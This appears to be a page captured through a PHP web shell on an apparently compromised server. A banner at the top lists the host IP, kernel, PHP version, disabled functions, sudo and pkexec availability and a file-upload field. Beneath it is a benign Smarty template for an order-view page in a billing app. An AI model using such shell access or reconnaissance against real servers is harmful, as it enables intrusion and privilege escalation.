| Server IP : 162.214.74.102 / Your IP : 216.73.217.80 Web Server : Apache System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64 User : lrsys ( 1015) PHP Version : 5.6.40 Disable Function : exec,passthru,shell_exec,system MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/lrsys/www/lrsys_apps/hering/ui/theme/lrsys/ |
Upload File : |
{include file="sections/header.tpl"}
<div class="row">
<div class="col-md-12">
<div class="panel panel-default">
<div class="panel-body">
<h3 style="color: #2f96f3;">{$_L['Order']} # {$order->id}</h3>
<hr>
<!-- {if $order->status eq 'Open'}<a href="{$_url}orders/convert_invoice/{$order->id}" class="md-btn md-btn-success waves-effect waves-light"><i class="fa fa-check"></i> {$_L['Convert order to Invoice']}</a>{/if} -->
{if not empty($order->sys_invoice_id)}<a href="{$_url}invoices/view/{$order->sys_invoice_id}" class="md-btn md-btn-warning waves-effect waves-light"><i class="fa fa-dollar"></i> {$_L['View Invoice']}</a>{/if}
{if has_access($user->roleid,'orders','edit')}
<!-- <a href="{$_url}orders/set/{$order->id}/Pending/" class="md-btn md-btn-primary waves-effect waves-light"><i class="fa fa-clock-o"></i> {$_L['Pending']} </a>-->
<!-- <a href="{$_url}orders/set/{$order->id}/Cancelled/" class="md-btn md-btn-warning waves-effect waves-light"><i class="fa fa-times"></i> {$_L['Cancel']} </a> -->
{/if}
{if has_access($user->roleid,'orders','delete')}
<a href="{$_url}delete/order/{$order->id}/" class="md-btn md-btn-danger waves-effect waves-light"><i class="fa fa-trash"></i> {$_L['Delete']} </a>
{/if}
<hr>
<h4>{$_L['Available Module for this Order']}</h4>
<a href="{$_url}orders/module/{$order->id}/" class="md-btn md-btn-primary waves-effect waves-light"><i class="fa fa-plus"></i> {$_L['Default']} </a>
<hr>
<div class="row">
<div class="col-md-4">
<div class="well">
<h4>{$_L['Order Number']} - {$order->id}</h4>
<p><strong>{$_L['Customer']}: </strong> {$order->account}</p>
<!-- <p><strong>{$_L['Product_Service']}: </strong> {$order->stitle}</p> -->
<p><strong>{$_L['Amount']}: </strong> <span class="amount">{$order->total}</span> </p>
<p><strong>{$_L['Date']}: </strong>{date( $_c['df'], strtotime($order->sales_date))}</p>
<p><strong>{$_L['Status']}: </strong>
{if $order->status eq 'Approved'}
<span class="label label-success">{ib_lan_get_line($_L[$order->status])}</span>
{else}
<span class="label label-danger">{ib_lan_get_line($_L[$order->status])}</span>
{/if}
</p>
<p><strong>{$_L['Invoice']}: </strong> {$order->sys_invoice_id}</p>
</div>
</div>
<div class="col-md-8">
<h4>{$_L['Activation Message']}</h4>
<hr>
<form method="post" id="ib_form">
<div class="form-group">
<label for="activation_subject">{$_L['Subject']}</label>
<input type="text" class="form-control" id="activation_subject" name="activation_subject" value="{$order->activation_subject}">
</div>
<div class="form-group">
<label for="activation_message">{$_L['Message']}</label>
<textarea class="form-control" id="activation_message" name="activation_message" rows="3">{$order->activation_message}</textarea>
</div>
<input type="hidden" name="oid" id="oid" value="{$order->id}">
<button type="submit" id="btn_activation_message_save" class="md-btn md-btn-success"><i class="fa fa-check"></i> {$_L['Save']}</button>
<button type="submit" id="btn_activation_message_send" class="md-btn md-btn-primary"><i class="fa fa-send"></i> {$_L['Send']}</button>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
{include file="sections/footer.tpl"}